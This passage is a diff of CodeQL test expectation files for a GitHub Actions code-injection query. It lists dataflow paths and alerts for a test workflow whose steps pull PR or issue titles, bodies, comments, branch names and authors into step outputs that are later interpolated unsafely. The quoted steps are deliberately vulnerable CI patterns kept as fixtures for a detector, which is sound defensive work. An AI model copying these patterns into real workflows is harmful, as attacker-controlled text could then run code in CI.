author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -643,6 +733,24 @@ subpaths | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 15d526ca7b4..6afef323ff0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| 